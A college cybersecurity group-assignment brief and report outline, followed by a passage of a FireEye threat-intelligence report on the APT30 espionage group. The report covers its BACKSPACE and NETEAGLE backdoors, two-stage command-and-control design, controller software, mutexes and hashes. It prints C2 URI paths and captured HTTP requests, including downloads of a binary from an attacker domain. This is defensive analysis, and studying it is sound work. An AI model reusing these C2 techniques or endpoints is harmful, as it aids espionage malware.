Cybersecurity Threat Landscape Paper
Advanced persistent threats (APTs) have been thrust into the spotlight due to their advanced tactics, techniques, procedures, and tools. These APTs are resourced unlike other types of cyber threat actors.
Your chief technology officer (CTO) has formed teams to each develop a detailed analysis and presentation of a specific APT, which she will assign to the team.
.
Your report should use
The Cybersecurity Threat Landscape Team Assignment Resources
to cover the following five areas:
Part 1: Threat Landscape Analysis
- Provide a detailed analysis of the threat landscape today.
- What has changed in the past few years?
- Describe common tactics, techniques, and procedures to include threat actor types.
- What are the exploit vectors and vulnerabilities threat actors are predicted to take advantage of?
Part 2: APT Analysis
- Provide detailed analysis and description of the APT your group was assigned. Describe the specific tactics used to gain access to the target(s).
- Describe the tools used. Describe what the objective of the APT was/is. Was it successful?
Part 3: Cybersecurity Tools, Tactics, and Procedures
- Describe current hardware- and software-based cybersecurity tools, tactics, and procedures.
- Consider the hardware and software solutions deployed today in the context of defense-in-depth.
- Elaborate on why these devices are not successful against the APTs.
Part 4: Machine Learning and Data Analytics
- Describe the concepts of machine learning and data analytics and how applying them to cybersecurity will evolve the field.
- Are there companies providing innovative defensive cybersecurity measures based on these technologies? If so, what are they? Would you recommend any of these to the CTO?
Part 5: Using Machine Learning and Data Analytics to Prevent APT
- Describe how machine learning and data analytics could have detected and/or prevented the APT you analyzed had the victim organization deployed these technologies at the time of the event. Be specific.
Part 6: Ethics in Cybersecurity. Ethical issues are at the core of what we do as cybersecurity professionals. Think of the example of a cyber defender working in a hospital. They are charged with securing the network, medical devices, and protecting sensitive personal health information from unauthorized disclosure. They are not only protecting patient privacy but their health and perhaps even their lives. Confidentiality, Integrity, Availability – the C-I-A triad – and many other cybersecurity practices are increasingly at play in protecting citizens in all walks of life and in all sectors. Thus, acting in an ethical manner is one of the hallmarks of cybersecurity professionals.
- Do you think the vulnerability(ies) exploited by the APT constitutes an ethical failure by the defender? Why or why not?
- For the APT scenario your group studied, were there identifiable harms to privacy or property? How are these harms linked to C-I-A? If not, what ethically significant harms could result from the scenario your group researched?
- For the APT scenario, your group studied when the targeted organization identified in the breach were they transparent in their disclosure? Do you feel the organization acted ethically?
- Use additional sources of information but also describe the concept in layman’s terms.
- Use visuals where appropriate.
- While quality is valued over quantity, it is expected that a quality paper will result in a minimum length of 10–15 pages.
The Cybersecurity Threat Landscape
Group Assignment
CMIT 495: Current Trends and Projects in Computer Networks and Security
[PROFESSOR NAME]
By:
[GROUP MEMBER NAMES]
Introduction
Part 1: Threat Landscape Analysis
· Provide a detailed analysis of the threat landscape.
· What has changed over the past year?
· Describe common tactics, techniques, and procedures to include threat actor types.
· What are the exploit vectors and vulnerabilities threat actors are predicted to take advantage of?
Part 2: APT Analysis
· Provide a detailed analysis and description of the APT your group was assigned. Describe the specific tactics used to gain access to the target(s).
· Describe the tools used. Describe what the objective of the APT was/is. Was it successful?
Part 3: Cybersecurity Tools, Tactics, and Procedures
· Describe current hardware- and software-based cybersecurity tools, tactics, and procedures.
· Consider the hardware and software solutions deployed today in the context of defense-in-depth.
· Elaborate on why these devices are not successful against the APTs.
Part 4: Machine Learning and Data Analytics
· Describe the concepts of machine learning and data analytics and how applying them to cybersecurity will evolve the field.
· Are there companies providing innovative defensive cybersecurity measures based on these technologies? If so, what are they? Would you recommend any of these to the CTO?
Part 5: Using Machine Learning and Data Analytics to Prevent APT
· Describe how machine learning and data analytics could have detected and/or prevented the APT you analyzed had the victim organization deployed these technologies at the time of the event. Be specific.
Part 6: Ethics in Cybersecurity
· Do you think the vulnerability(ies) exploited by the APT constitute an ethical failure by the defender? Why or why not?
· For the APT your group studied, were there identifiable harms to privacy or property? How are these harms linked to C-I-A? If not, what ethically significant harms could result from the scenario your group researched?
· For the APT your group studied, when the targeted organization identified the breach, was the disclosure made with transparency? Do you feel the organization acted ethically? Why or why not?
Conclusion
References
SP E C I A L R E P O R T
SECURITY
REIMAGINED
APRIL 2015
F I R E E Y E L A B S / F I R E E Y E T H R E A T I N T E L L I G E N C E
APT30 AND THE MECHANICS
OF A LONG-RUNNING CYBER ESPIONAGE OPERATION
How a Cyber Threat Group Exploited Governments and Commercial
Entities across Southeast Asia and India for over a Decade
APT30 and the Mechanics of a Long-Running Cyber Espionage Operation
SPECIAL REPORT
2
Introduction
3
Key Findings
4
APT30: In It for the Long Haul
5
Professionally Developing Tools: APT30 Uses a Consistently Organized Malware Development Approach
7
Using Two-Stage C2 to Balance Stealth and Scalability
9
APT30’s Full-Featured Backdoor Control System Suggests Target Prioritization and Shift Work 1
1
Establishing Remote Control
12
BACKSPACE Controller-Backdoor Communication
14
Target Host Prioritization and Alerts 14
Executing Custom Tasks
15
Version Control and Automatic Updates 15
Disk Serial Number Authentication 1
6
APT30 Possibly Working in Shifts
16
APT30’s Primary Mission: Data Theft for Political Gain
17
APT30’s Targets Align with Chinese Government Interests and Focus on Southeast Asia
19
APT30 Pursues Members of the Association of Southeast Asian Nations (ASEAN)
20
ASEAN-themed Infrastructure and Customized Tools
21
Customized Malware Deployed around ASEAN Summits in January and April 2013
22
Social Engineering Consistently Includes Regional Security and Political Themes
25
APT30 Leverages Major Political Transition as Phishing Lure Content in Campaign Geared
to Key Political Stakeholders
23
Repeated Decoy Subjects on India-China Military Relations and Contested Regions 23
APT30’s Targeting of Journalists and Public Relations Topics
26
Conclusion 28
Appendix A – Detailed Malware Analysis
29
Backdoors 29
BACKSPACE Backdoor – “ZJ” Variant
30
BACKSPACE Backdoor – “ZR” Variant
36
NETEAGLE Backdoor – “Scout” Variant
47
NETEAGLE Backdoor – “Norton” Variant
50
Malware Targeting Removable Drives
51
SHIPSHAPE 51
SPACESHIP
53
FLASHFLOOD
55
Miscellaneous Tools
57
MILKMAID / ORANGEADE Droppers and CREAMSICLE Downloader 57
BACKBEND and GEMCUTTER Downloaders
58
Appendix B – MD5 HASHES
60
Appendix C – ENDNOTES
67
CONTENTS
APRIL 2015
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
3
SPECIAL REPORT
3
33
hen our singapore-based fireeye labs team examined
malware aimed predominantly at entities in
Southeast Asia and India, we suspected that
we were peering into a regionally focused
cyber espionage operation. The malware
revealed a decade-long operation focused on
targets—government and commercial—who
hold key political, economic, and military
information about the region. This group, who
we call APT30, stands out not only for their
sustained activity and regional focus, but also
for their continued success despite maintaining
relatively consistent tools, tactics, and
infrastructure since at least 2005.
In essence, our analysis of APT30 illuminates
how a group can persistently compromise
entities across an entire region and subcontinent,
unabated, with little to no need to significantly
change their modus operandi. Based on our
malware research, we are able to assess how
the team behind APT30 works: they prioritize
their targets, most likely work in shifts in a
collaborative environment, and build malware
from a coherent development plan. Their missions
focus on acquiring sensitive data from a variety
of targets, which possibly include classified
government networks and other networks
inaccessible from a standard Internet connection.
While APT30 is certainly not the only group to
build functionality to infect air-gapped networks
into their operations, they appear to have made
this a consideration at the very beginning of their
development efforts in 2005, significantly earlier
than many other advanced groups we track.
Such a sustained, planned development effort,
coupled with the group’s regional targets and
mission, lead us to believe that this activity is
state sponsored—most likely by the Chinese
government. Rather than focus on the potential
sponsorship of this activity, this report seeks to
thoroughly analyze the development effort of one
of the longest-running advanced threat groups
we’ve observed.
APT30 and the Mechanics of a Long-Running Cyber Espionage Operation
APT30 is noted for
sustained activity, but also
for successfully maintaining
the same tools, tactics, and
infrastructure since at least
2005.
SPECIAL REPORT
4
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
KEY FINDINGS
APT30’s development
and refinement of a
set of integrated tools,
as well as their re-use
of infrastructure over
a period of 10 years,
suggests a consistent
long-term mission.
This suite of tools
includes downloaders,
backdoors, a central
controller, and several
components designed to
infect removable drives
and cross air-gapped
networks to steal data.
APT30 frequently
registers their own
DNS domains for use
with malware command
and control (C2). Based
on their presence in
malware samples, some
of the domains have been
in use for many years.
APT30 has a structured
and organized
workflow, illustrative
of a collaborative team
environment, and their
malware reflects a
coherent development
approach. The group (or
the developers supporting
them) systematically
labels and keeps track of
their malware versioning.
The malware uses
mutexes and events to
ensure only a single copy
is running at any given
time, and the malware
version information is
embedded within the
binary. Malware C2
communications include a
version check that allows
the malware to update
itself to the latest copy,
providing a continuous
update management
capability.
The controller software
for APT30’s BACKSPACe
backdoor (also known
as “Lecna”) suggests the
threat actors prioritize
targets and may work on
shifts. APT30 backdoors
commonly use a two-
stage C2 process, where
victim hosts contact
an initial C2 server to
determine whether they
should connect to the
attackers’ main controller.
The controller itself
uses a GUI that allows
operators to prioritize
hosts, add notes to
victims, and set alerts
for when certain hosts
come online. Finally, an
unused dialog box in the
controller provides a login
prompt for the current
“attendant.”
The group’s primary goal
appears to be sensitive
information theft for
government espionage.
APT30 malware
includes the ability to
steal information (such
as specific file types),
including, in some cases,
the ability to infect
removable drives with the
potential to jump air gaps.
Some malware includes
commands to allow it to
be placed in “hide” mode
and to remain stealthy
on the victim host,
presumably for long-term
persistence.
APT30 predominantly
targets entities
that may satisfy
governmental
intelligence collection
requirements. The
vast majority of
APT30’s victims are
in Southeast Asia.
Much of their social
engineering efforts
suggest the group is
particularly interested
in regional political,
military, and economic
issues, disputed
territories, and
media organizations
and journalists who
report on topics
pertaining to China
and the government’s
legitimacy.
10.
YEARS
1
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
India
South Korea
Malaysia
Vietnam
Nepal
Bhutan
Philippines
Singapore
Indonesia
Brunei
Myanmar
Laos
Cambodia
Japan
Thailand
Saudi Arabia
United States
Countries with Confirmed APT 30 Targets Countries with Likely APT30 Targets
5
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
O
ur analysis of APT30’s malware and
domain registration data shows the group
has been operating for over a decade. The
earliest-known registration dates for domains
attributed to APT30 go back to 2004, and the
compile times for APT30 malware using those
domains for C2 date back to 2005.1
Typically, threat groups who register domains for
malicious use will abandon them after a few years.
APT30, however, has used some of their domains
for more than five years, with some of their
earliest domains still in use as of at least late 2014.
For example, one of the earliest known
BACKSPACE malware samples (md5 hash
b2138a57f723326eda5a26d2dec56851)
was compiled onMarch 11, 2005 at 00:44:47.
The sample used the domain www.km-nyc[.]
com as its primary C2 location. That domain
was still in use as a secondary C2 domain in
a BACKSPACE sample compiled as recently
as November 5, 2014 05:57:26 (md5 hash
38a61bbc26af6492fc1957ac9b05e435).
For such a long operational history, APT30
appears to have conducted their activity using
a surprisingly limited number of tools and
backdoors. One reason for this might be that
they have had no need to diversify or add to their
arsenal if they have been successful with their
current approach. Although APT30 has used a
variety of secondary or supporting tools over the
years (such as droppers and downloaders used to
deploy APT30’s primary backdoors), their primary
tools have remained remarkably consistent over
time: namely, the backdoors BACKSPACE and
NETEAGLE, and a set of tools (SHIPSHAPE,
SPACESHIP, and FLASHFLOOD) believed to be
designed to infect (and steal data from) air-gapped
networks via infected removable drives.
Where some threat groups might exchange one
backdoor for another as newer, more flexible,
or more feature-rich tools become available,
APT30 has chosen to invest in the long-term
refinement and development of what appear
to be a dedicated set of tools. This suggests
that APT30 (or the developers providing them
with tools) has the ability to modify and adapt
their source code to suit their current needs or
their target environment. The earliest variants of
the BACKSPACE backdoor date to at least 2005,
and versions of the backdoor remain in use today.
BACKSPACE itself appears to have a flexible,
modularized development framework and has
been modified over time to create a wide range of
variants.
APT30:
In It for the Long Haul
km-nyc.com
km153.com
11 March 2005
11 May 2014
COMPILE DATE–RECENT SAMPLECOMPILE DATE–EARLY SAMPLE
11 May 2014
4 September 2007
DOMAIN REGISTRATION DATEDOMAIN
11 March 2004
30 August 2007
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
6
FireEye has identified two main “branches”
of the BACKSPACE code (“ZJ” and “ZR”),
each compiled with a slightly different set of
commands. In addition, while BACKSPACE has
been implemented in a variety of ways (e.g., as a
standalone EXE, as a DLL, as an EXE that extracts
and launches a DLL at runtime) and leveraged a
variety of persistence methods (e.g., via a shortcut
(.lnk) file in the Startup folder, as a service
DLL), the core functionality has remained largely
unchanged, although some additional features
have been added over time.
While the NETEAGLE backdoor does not have
as venerable a history (identified samples were
compiled as early as 2008 and as recently as
2013), it shows a similar pattern of long-term
refinement and modification, including the
development of two main variants (which we call
the “Scout” and “Norton” variants). Just as with
BACKSPACE, while the details of implementation
and specific features across NETEAGLE samples
may vary, the core functionality remains the
same except for the addition of features or
enhancements.
This dedication to adapting and modifying
tools over a number of years, as opposed to
discarding old tools in favor of newer, readily
available ones, implies that APT30 has a
long-term mission, and that their mission is
consistent enough for their existing tools to be
sufficient to support their operations over a
long period of time.
APT30 appears to have a consistent,
long-term mission that relies on existing
tools to remain sufficient over time.
COMPILE DATE–RECENT SAMPLECOMPILE DATE–EARLY SAMPLEMALWARE / TOOL
BACKSPACE 2 January 2005 5 November 2014
NETEAGLE 20 June 2008 6 November 20
13
SHIPSHAPE 22 August 2006 9 June 2014
SPACESHIP 23 August 2006 5 June 2014
FLASHFLOOD 31 January 2005 17 February 2009
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
7
I
n addition to APT30’s long-term use of a
regular set of tools, in most cases the tools
themselves – while they may vary in purpose –
share a consistent set of development features. In
particular, the tools all exhibit a carefully managed
versioning system and a consistent method for
checking version information, performing updates,
and ensuring only a single copy of a given tool is
running on a victim host at any time. This suggests
that APT30 is dedicated to maintaining a tightly
run, efficient operation.
BACKSPACE, NETEAGLE, SHIPSHAPE, and
SPACESHIP all maintain an internal version
number and include some means to check their
version number against a reference version, and
attempt to automatically update the malware if
its version is different than the reference number.
For some APT30 malware, we speculate that
the version string may also describe additional
properties of the malware. For instance, one
variant of BACKSPACE (“ZRLnk”) uses a version
string where the first two digits indicate the
malware version number. The next character
may indicate the type of icon stored in the file’s
resource section and possibly the type of exploit
document used to deliver the malware (for
example, ‘p’ for Acrobat Reader / PDF and ‘w’ for
Microsoft Word 2). Finally, the next character (‘l’)
may indicate that that the malware uses a shortcut
(.lnk) file to maintain persistence. 3
PROFESSIONALLY
DEVELOPING TOOLS:
APT30 Uses a Consistently Organized
Malware Development Approach
Table 1: ZRLnk version history
MD5 Hash Version Compile Time Size
b4ae0004094b37a40978ef06f311a75e 1.0.p.l 4 November 2010 03:51 73,7
28
37aee58655f5859e60ece6b249107b87 1.1.w.l 25 February 2011 02:03 32,7
68
8ff473bedbcc77df2c49a91167b1abeb 1.2.w.l 4 May 2011 14:46 49,1
52
4154548e1f8e9e7eb39d48a4cd75bcd1 1.2.w.l 4 May 2011 14:46 17,408
15304d20221a26a0e413fba4c5729645 1.2.w.l 16 May 2011 11:03 36,8
64
c4dec6d69d8035d481e4f2c86f580e81 1.3.w.l 26 October 2011 11:21 40,960
a813eba27b2166620bd75029cc1f04b0 1.3.p.l 28 June 2012 10:01 86,1
44
5b2b07a86c6982789d1d85a78ebd6c54 1.5.w.lN 8 January 2013 01:33 10,518,528
71f25831681c19ea17b2f2a84a41bbfb 1.6.w.lY 23 April 2013 08:12 57,344
6ee35da59f92f71e757d4d5b964ecf00 1.9.w.lY 28 August 2014 0 9:12 57,344
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
888
With respect to version numbers, the BACKSPACE “ZJ”
variant has the longest revision history. Our analysis of
55 ZJ samples showed versions from 1.2 through 20.50
spanning nearly eight years (from 2005 through 2012,
based on compile times).
Besides version control, most malware used by APT30
(to include BACKSPACE, SHIPSHAPE, SPACESHIP, and
FLASHFLOOD) uses a consistent methodology (a set of
mutexes and events) to manage malware execution and
ensure that only a single copy of a given piece of malware
is running at any one time, presumably to decrease
the chances of detection. The mutexes and events are
highly consistent in their naming conventions, with most
containing the terms ‘Microsoft’ or ‘ZJ’ or both. The mutex
is created when the malware executes, and ensures only
one copy is running at a time. The events use similar naming
conventions as the mutexes, and are used to signal the
malware and associated threads to exit.4
The emphasis on malware versioning implies a structured
and well-managed development environment. Similarly,
the close attention to ensuring only one copy of a given
tool is running at a time and a well-developed, automated
means of update management imply that these tools are in
use by a professional team of threat actors. We can infer
that the threat actors are interested in maintaining the
latest and greatest versions of their tools in their victims’
environments. Likewise, the threat actors are likely
operating at a sufficiently large scale that they benefit
from the automated management of many of their tools.
While there is no guarantee that the tools described in this
paper are exclusive to APT30, we have not yet observed
these tools used by any other threat groups. That the tools
have evolved over time while maintaining a consistent
amount of core functionality indicates that APT30
has development resources available to modify and
customize their malware. This implies either that
APT30 is responsible for developing their own tools,
or has a working relationship with developers able to
support them in a consistent (and possibly exclusive)
manner.
Table 2: Mutexes and events used for process execution and version control
Malware Example Mutexes / Events
BACKSPACE MicrosoftZj
MicrosoftExit
MicrosoftHaveAck
MicrosoftHaveExit
BACKSPACE MicrosoftZjLnk
MicrosoftExitLnk
MicrosoftHaveLnkAck
MicrosofthaveLnkExit
SHIPSHAPE MicrosoftShipZJ
MicrosoftShipExit
MicrosoftShipHaveAck
MicrosoftShipHaveExit
SPACESHIP
MicrosoftShipTrZJ
MicrosoftShipTrExit
MicrosoftShipTrHaveExit
FLASHFLOOD MicrosoftFlashZJ
MicrosoftFlashExit
MicrosoftFlashHaveAck
MicrosoftFlashHaveExit
APT30 likely either develops their own tools
or has a working relationship with
developers who are able to consistently –
perhaps exclusively – support them.
9
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
Table 3: Example URIs used for BACKSPACE first-stage C2
URI (
/ForZRLnk3z/hostlist.txt Validation check and list of victims to perform further actions.
/some/edih.txt Switch specified victims to “hide” mode.
/some/nur.txt Switch specified victims to “run” mode.
/ForZRLnk3z/bak.txt
Switch to backup stage one C2 server (BACKSPACE is typically configured with main and backup
first-stage C2 servers).
/ForZRLnk3z/app.txt Download and execute the file.
/ForZRLnk3z/myapp.txt Download and execute the file (if victim appears in hostlist.txt).
/ForZRLnk3z/ver.txt Perform version check.
/ForZRLnk3z/exe.txt Download and execute the file if the version check fails (self-update).
/ForZRLnk3z/SomeUpVer.txt Backup URI for version check.
/ForZRLnk3z/SomeUpList.txt List of hostnames that should perform self-update if backup version check fails.
/ForZRLnk3z/SomeUpExe.txt Backup URI for self-update.
/ForZRLnk3z/dizhi.gif Second-stage C2 information (IP address and port(s)).
/ForZRLnk3z/connect.gif List of victims to connect to second-stage C2 controller.
T
he BACKSPACE and NETEAGLE
backdoors used by APT30 use a two-stage
C2 infrastructure. The backdoors are
configured with an initial (stage one) set of C2
locations, typically one or more C2 domains.
Interaction with the stage one C2 is fully
automated; that is, the stage one C2 does not
support any interactive communication between
the threat actor and the victim computer. Both
BACKSPACE and NETEAGLE use HTTP requests
to interact with the stage one C2, requesting
URIs to download different files that are used to
obtain basic instructions, information (including
second stage C2 locations) or download and
execute additional binaries. While victim hosts
may beacon to the second stage C2 (e.g., transmit
data about the victim without expectation of a
response), only those victim hosts specifically
instructed to do so will establish a full connection
to a BACKSPACE controller. Once the malware
has connected to the controller, the threat actor
can interact directly with the victim host.
By using this two-stage approach, the threat
actors introduce a layer of obfuscation
between themselves and their victims. This also
allows them to better manage their victims,
particularly at scale; newly infected victims
can interact with the stage one C2 servers in
an automated fashion until the threat actors
can review them and select particular hosts for
interactive, stage two exploitation.
The table below shows an example set
of URIs that may be requested by the
BACKSPACE sample with md5 hash
6ee35da59f92f71e757d4d5b964ecf00, and the
purpose of each file.5 Full URIs are in the format
of hxxp://
C2 domains;
varies across samples (/some/ or /ForZRLnk3z/
in the examples below); and
specific file requested.
USING TWO-STAGE C2
to Balance Stealth and Scalability
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
10
port 1 port 2
Stage Two C2 Server
(IP:port1:port2)
Stage One C2 Server BACKSPACE Victim Host
2. Victim host downloads dizhi.gif
from the Stage One C2.
4. APT30 threat actor uses the BACKSPACE controller to generate
connect.gif and upload it to the Stage One C2. The file contains the
hostname and host ID of the victim computer.
5. Victim host downloads connect.gif
from the Stage One C2, compares
the hostname and host ID.
3. Victim host transmits system
information via HTTP POST
beacon to IP:port1 (connection is
instantly created).
port 1 port 2
port 1 port 2
port 1 port 2
dizhi.gif
connect.gif connect.gif
system information
Figure 1: A typical victim interaction with the stage one and stage two C2 servers
1. APT30 threat actor uses the BACKSPACE controller to generate
dizhi.gif and upload it to the Stage One C2. The file contains
IP:port1:port2 information for Stage Two C2.
dizhi.gif
6. Victim host establishes a separate
TCP connecton to IP:port2 for
remote control (connection is kept
during the control).
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
11
APT30’S FULL-FEATURED
BACKDOOR CONTROL SYSTEM
Suggests Target Prioritization and Shift Work
A
dditional information about APT30’s
operations can be inferred by examining
the GUI controller used to manage their
BACKSPACE backdoors. FireEye analyzed three
copies of the BACKSPACE controller software,
known as the “NetEagle Remote Control System”
6 (according to the version information from one
sample) or 网络神鹰远程控制系统 (according
to the “About” dialog box). Although the copies
we analyzed were compiled in 2010, 2011, and
2013 respectively, the tool’s descriptions indicate
the original controller software may have been
developed as early as 2004.7
The BACKSPACE controller is a well-developed,
full-featured GUI tool. The controller includes
main menu items for “System”, “Network”, “File”,
“Remote”, and “Attack” operations, in addition to
the “About” dialog box. Information about victim
hosts connected to the controller is displayed in
the lower panes, including the hostname, internal
and external IP addresses, system uptime, and OS
version and language.
Figure 2: Version information from BACKSPACE controller
Figure 3: “About” dialog box from “NetEagle” BACKSPACE controller
Many of APT30’s tools
perform version checks and
attempt to self-update.
Comments: ©2004 Microsoft Corporation. 保留所有权利。
CompanyName: Flyeagle science and technology company
FileDescription: NetEagle Remote Control Software
FileVersion: 4.2
InternalName: Neteagle
LegalCopyright: 版权所有 © 2004-永久
LegalTrademarks:
OriginalFilename: NETEAGLE.EXE
PrivateBuild:
ProductName: NetEagle Remote Control Software
ProductVersion: 4.2
SpecialBuild:
12
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
Figure 5: BACKSPACE controller showing sample victim idle (top), and with remote control established (bottom)
Figure 4: BACKSPACE controller GUI with sample victim data
ESTABLISHING REMOTE CONTROL
Communication with the stage two C2 server
(e.g., the BACKSPACE controller) is managed
via two files hosted on the stage one C2 server,
dizhi.gif and connect.gif. BACKSPACE victim
computers will retrieve dizhi.gif and transmit
information about the victim computer (via HTTP
POST) to the second stage IP address and port
specified in that file. This victim information is
used to populate the controller GUI (see Figure
4). However, BACKSPACE clients do not establish
interactive connections to the BACKSPACE
controller by default, as this would increase the
risk of exposing the second-stage C2 server.
When a threat actor wants to establish
remote control over a victim host, he uploads a
notification file (e.g., connect.gif) containing
the victim hostname and host ID number to the
stage one C2 server. Victim hosts will parse the
connect.gif file retrieved from the server and
connect to the BACKSPACE controller (using the
data from dizhi.gif) if their hostname and host
ID are present in the file.
System Network File Remote Attack About
Local Info Computer Name IP Location Refresh Interval (min) Online Capacity
Hostname Public IP Private IP Location Up-Time OS Comment Host ID Domain Controller Name
Domain
Hostname Public IP Private IP Location Up-Time OS/Language Comment Host ID Controller Name
√
13
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
Figure 6:
Configuration
options for dizhi.gif
and connect.gif
Both dizhi.gif and connect.gif are generated
by the BACKSPACE controller based on user-
defined configuration settings and automatically
uploaded to the stage one C2 server. This
simplifies management of victim computers,
reduces the risk of configuration errors, and
allows even relatively unskilled operators to
manage C2 infrastructure and victim hosts.
The screen shot below shows the configuration
options for the two files, including the FTP
credentials used to connect to the stage one
server, the path for the files, the names of the
files, and the primary and backup stage one C2
servers. These same configuration settings are
used to customize a copy of the BACKSPACE
malware, by “patching” the relevant bytes within
the BACKSPACE binary.
Similarly, a second dialogue box allows the threat
actor to specify the ports (listed in dizhi.gif)
used for communication with the second stage
C2 server/BACKSPACE controller. The first port
is used to transmit victim data via HTTP POST.
The second port is used to establish an interactive
connection with the BACKSPACE controller. The
third port is used for a reverse command shell
between the controller and the victim.
Double-clicking an idle victim in the BACKSPACE
controller GUI will automatically create (or
update) connect.gif with that victim’s hostname
and host ID and upload the new file to the stage
one C2 server. The next time the victim parses the
file, it will establish a connection to the controller.
Figure 7:
Dialog box for configuring ports
for second stage C2
14
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
Figure 8:
Sample victim host data
sent to BACKSPACE
controller
BACKSPACE CONTROLLER – BACKDOOR
COMMUNICATION
The BACKSPACE controller uses a modified
HTTP protocol to communicate with BACKSPACE
clients on victim hosts. Victim hosts send data to
the controller in HTTP POST format. When the
controller receives the data, it ignores other HTTP
headers and only parses the Content-Length
value and the body data. No acknowledgement
packet is sent back to the backdoor.
The BACKSPACE controller sends remote
command messages to BACKSPACE clients in
the format below, disguised as a response from a
Microsoft IIS 6.0 server. Similar to the controller,
the BACKSPACE client only parses the Content-
Length field and the remote command stored in
the body and ignores other HTTP headers.
POST /index.htm HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
HOST: 192.168.43.130:80
Pragma: no-c ache
Content-Length: 2
35
Proxy-Connection: Keep-Alive
USER-29861D99F7.192.168.43.133………….(……Service Pack
3……………………………………………………………….
……………………………………………..N..1.0.p.18:32.www.stonehoof.
com/ForZRMail..
Figure 9:
Sample remote command sent from controller
to BACKSPACE backdoor
HTTP/1.1 200 OK
Server: Microsoft-IIS6.0
Content-Length: 12
Content-Type: */*
Accept-Ranges: bytes
Connection: Keep-Alive
B….C:\*.*.
TARGET HOST PRIORITIZATION
AND ALERTS
The BACKSPACE controller allows the threat
actors to further manage their victim hosts
by labeling individual hosts with a comment,
assigning a priority level to the victim (“Normal”,
“Important”, or “Very Important”), and setting an
alert to notify the threat actor when the victim
host comes online.
Figure 10:
Dialog box to set priority and other options on
a victim host
APT30 assigns a priority level to
their victims: “Normal,” “Important,”
and “Very Important.”
15
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
Figure 12: BACKSPACE controller showing path used by other APT30 tools
Figure 11:
BACKSPACE controller
“automatically execute
custom task” command
EXECUTING CUSTOM TASKS
The BACKSPACE controller includes a menu
item called “Automatically Execute Custom Task”
(highlighted below) which sends the ‘O’ command
supported by some variants of the BACKSPACE
backdoor.8 When the backdoor receives this
command, it uploads data to the controller from
predefined paths on the victim host ($LDDATA$\
and %WINDIR%\$NtUninstallKB900727$\).
This special command appears to be used to
retrieve stolen data from the victim computer
in an automated fashion (as opposed to
manually uploading files or directories). Of
note is that these paths are found in other tools
used by APT30 (specifically SPACESHIP and
FLASHFLOOD) believed to be used to target air-
gapped computers and networks.9
Below the “Automatically Execute Custom
Task” menu item is another custom option for
“GOTO custom path”. When selected, that menu
item also directs the operator to a predefined
custom path (one used by some versions of
FLASHFLOOD) by default:
VERSION CONTROL AND AUTOMATIC
UPDATES
Like many of the tools used by APT30, the
BACKSPACE controller also performs a version
check and attempts to self-update. The controller
will transmit the following HTTP requests for
a version file (NetEagleVer.txt) and updated
binary (NetEagle.exe) when it starts.
Figure 13: BACKSPACE controller version check
and self-update
GET /NE.General NetEagleVer.txt HTTP/1.1
Accept: */*
User-Agent: HttpClient
Host: www.km153.com
GET /NE.General/NetEagle.exe HTTP/1.1
Accept: */*
User-Agent: HttpClient
Host: www.km153.com
16
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
Figure 15:
BACKSPACE controller “attendant” dialog box
Figure 14:
Encoded disk serial
numbers in the
BACKSPACE
controller binary
DISK SERIAL NUMBER AUTHENTICATION
The BACKSPACE controller also includes a
check to ensure that the controller is only run on
authorized machines. The controller compares
the local host’s hard disk serial number with
45 encoded serial numbers hardcoded within
the controller binary, and continues execution
only if there is a match. This indicates that the
developers of the controller wanted to limit its
distribution and use. The developers could have
written the controller for themselves; alternately,
the controller could have been sold with built-in
restrictions so the developers could continue to
write and sell custom versions to others.10 Given
the tightly integrated nature of much of APT30’s
malware (with each other and with the controller)
and the fact that the controllers themselves use
APT30 domains to perform self-update checks,
it seems more likely that APT30 (or a group of
developers closely aligned with them) created the
controller for their own use.
APT30 POSSIBLY WORKING ON SHIFTS
In our analysis of the BACKSPACE controller, we
identified a dialog box in the portable executable
(PE) resource section. The dialog box included a
login prompt with the text请输入您的值班员代号,
which translates to “Please enter your attendant
code”. This suggests the tool may have been
designed to track work shifts amongst multiple
operators, although this particular feature was
disabled in the sample we analyzed.
The history of the BACKSPACE controller
(possibly written as early as 2004, and still
compatible with BACKSPACE variants
compiled within the past year) reflects a tool
developed over time and designed to facilitate
detailed interaction with victim hosts through a
relatively simple interface. The tool is capable
of supporting interaction with a large number
of victim hosts, and includes features to
allow the operator to filter, prioritize, alert
on, and otherwise manage his or her victims,
implying operations large enough to warrant
such features. The controller exhibits the same
diligent version control and self-updating features
observed in other malware used by APT30. In
addition, the serial number checks built in to
the BACKSPACE controller imply a very limited
distribution tool designed to be used by only a
select number of users. Finally, the “attendant”
dialog box implies that the controller itself may
have been designed for use in a highly organized
environment. All of these factors point to a threat
group with long-term, organized, and structured
development resources; a need to manage and
track a potentially large number of victims over
time; and an organized work force responsible
for carrying out the group’s objectives.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
17
APT30’S PRIMARY MISSION:
Data Theft for Political Gain
B
ased on our knowledge of APT30’s targeting
activity and tools, their objective appears
to be data theft as opposed to financial
gain. APT30 has not been observed to target
victims or data that can be readily monetized (for
example, credit card data, personally identifiable
information, or bank transfer credentials). Instead,
their tools include functionality that allows them
to identify and steal documents, including what
appears to be an interest in documents that may be
stored on air-gapped networks.
Both the BACKSPACE and NETEAGLE backdoors
support a range of command functions that allow
the threat actors to manipulate files on the victim
host, including reading and writing files, searching
for files with specific names or attributes, deleting
files, and uploading selected files to the controller.
11 While those commands are not atypical for
full-featured backdoors, some of the BACKSPACE
commands are more specialized, returning file
metadata (such as file name, size, attributes, and
MAC times) to the controller.12 Transmitting
